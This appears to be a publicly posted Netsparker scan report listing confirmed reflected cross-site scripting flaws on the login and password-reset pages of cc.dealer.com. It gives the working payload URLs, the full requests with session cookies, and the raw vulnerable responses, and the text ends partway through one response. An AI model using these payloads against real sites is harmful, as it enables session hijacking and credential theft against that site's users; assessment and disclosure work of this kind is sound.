Netsparker, Web Application Security Scanner

XSS, DORK, HTTP Header Injection, cc.dealer.com


Netsparker - Scan Report Summary
TARGET URL
https://cc.dealer.com/views/login?sessionTime...
SCAN DATE
4/16/2011 8:12:42 PM
REPORT DATE
4/17/2011 7:30:36 AM
SCAN DURATION
01:13:53

TOTAL REQUESTS
AVERAGE SPEED (req/sec.)
IDENTIFIED
14
CONFIRMED
9
CRITICAL
0
INFORMATIONAL
0

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
IMPORTANT
50 %
MEDIUM
29 %
LOW
21 %
Cross-site Scripting

6 TOTAL
IMPORTANT
CONFIRMED
6
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several different attack opportunities, most commonly hijacking the user's current session or altering the page's HTML on the fly to steal the user's credentials. It happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker may target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML; where the output is HTML, ensure that all active content is removed prior to its presentation to the user.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list need only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.


- /views/forgot-password

/views/forgot-password CONFIRMED

https://cc.dealer.com/views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter   Type   Value
reseller    GET    '"--></style></script><script>alert(0x000145)</script>
lang        GET    en_US

Request

GET /views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000145)%3C/script%3E&lang=en_US HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1dt87nysoan86; ssoid=6129048a404638d30061b29f3d794177
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 1480
Date: Sun, 17 Apr 2011 01:52:48 GMT
Connection: keep-alive
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Forgot Username/Password</title><style type="text/css"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000145)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 85%; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #fireFoxDiv{ visibility: hidden; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #fireFoxDiv td{ font-size: 11px; font-weight: normal; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;} .error, .required{ color: #880000; } .requiredField{ background: #FFFDE6; } .errorField{ /*border: 1px solid #cc0000;*/ 
background: #FFD8D3; }</style><script type="text/javascript"> function doSubmit() { if(confirm('Your current password will be reset and a new one will be e-mailed to you. Click OK to continue.')) document.forms[0].submit(); } </script></head><body><form method='POST'><input type='hidden' name='_state' value='submit' class='' > <table id="loginTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="0" cellspacing="0" id="links"> <tr> <td align="center"><a href="/views/login?reseller='"--></style></script><script>netsparker(0x000145)</script>" border="0"><span>Return to login</span></a></td> </tr> </table> <div id="loginBox"> <table width="100%" cellspacing="4" cellpadding="2" border="0"> <tr> <td colspan="2"> <div class="instructions"> Forgot your username?&nbsp;Contact Support<br> Forgot your password?&nbsp;Submit the form below </div> </td> </tr> <tr> <td width="10%" nowrap>Username:&nbsp;<span class="required">*</span></td> <td><input type='text' name='username' value='' class='requiredField' style='width:90%'></td> </tr> <tr> <td width="10%" nowrap>Email Address:&nbsp;<span class="required">*</span></td> <td><input type='text' name='email' value='' class='requiredField' style='width:90%'></td> </tr> <tr> <td colspan="2" align="center"> <input type="button" value='Get New Password' onClick="doSubmit()"> </td> </tr> </table> </div> <div id="fireFoxDiv" onClick=""> </div> </td> </tr> </table></form></body></html>
- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscr..

Parameters

Parameter     Type   Value
loginFailed   GET    true
reseller      GET    '"--></style></script><script>alert(0x000162)</script>
lang          GET    3
reason        GET    INVALID_USERNAME_PASSWORD

Request

GET /views/login?loginFailed=true&reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000162)%3C/script%3E&lang=3&reason=INVALID_USERNAME_PASSWORD HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f6e8e404638d30061b29fae9e4b4a
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3732
Date: Sun, 17 Apr 2011 01:59:49 GMT
Connection: keep-alive


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US"); } </script> <!-- NOTE; Moving to external file doesn't play nice --><style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/'"--></style></script><script>netsparker(0x000162)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, 
#devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="'"--></style></script><script>netsparker(0x000162)</script>"><input type="hidden" name="lang" value="3"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Invalid Username or Password, please try again.</div> </td> </tr> <tr> 
<td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } 
#loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/> <!--<br/>You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a><br/><br/><br/>--> Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. 
</span><br/><br/> <img src="https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000162)</script>/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","'"--></style></script><script>netsparker(0x000162)</script>","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! 
var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>
- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang='%22--%3E%3C/style%3E%3C/script%3..

Parameters

Parameter     Type   Value
loginFailed   GET    true
reseller      GET    3
lang          GET    '"--></style></script><script>alert(0x000163)</script>
reason        GET    INVALID_USERNAME_PASSWORD

Request

GET /views/login?loginFailed=true&reseller=3&lang='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000163)%3C/script%3E&reason=INVALID_USERNAME_PASSWORD HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3724
Date: Sun, 17 Apr 2011 01:59:52 GMT
Connection: keep-alive


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=3&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=3&lang=en_US"); } </script> <!-- NOTE; Moving to external file doesn't play nice --><style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/3/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: 
normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="3"><input type="hidden" name="lang" value="'"--></style></script><script>netsparker(0x000163)</script>"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Invalid Username or Password, please try again.</div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> 
<td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> 
<td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/> <!--<br/>You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a><br/><br/><br/>--> Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. 
</span><br/><br/> <img src="https://cc1.dealer.com/images/3/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","3","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! 
var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=3&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>
- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=3&reason='%22--%3E%3C/style%3E%3C..

Parameters

Parameter     Type   Value
loginFailed   GET    true
reseller      GET    3
lang          GET    3
reason        GET    '"--></style></script><script>alert(0x000164)</script>

Request

GET /views/login?loginFailed=true&reseller=3&lang=3&reason='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3E HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3702
Date: Sun, 17 Apr 2011 01:59:53 GMT
Connection: keep-alive


<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=3&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=3&lang=en_US"); } </script> <!-- NOTE; Moving to external file doesn't play nice --><style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/3/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: 
